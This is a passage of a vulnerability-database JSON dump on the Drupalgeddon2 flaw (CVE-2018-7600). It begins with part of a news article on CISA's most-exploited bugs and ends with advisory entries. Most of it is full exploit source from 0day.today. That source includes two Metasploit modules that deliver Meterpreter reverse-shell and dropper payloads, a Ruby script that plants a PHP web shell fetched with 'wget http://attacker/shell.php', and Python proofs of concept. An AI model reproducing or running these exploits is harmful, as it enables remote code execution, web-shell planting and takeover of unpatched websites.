([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2022-01-26T11:36:53", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:17FB524069BA3CD18537B30C76190BF7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:33", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 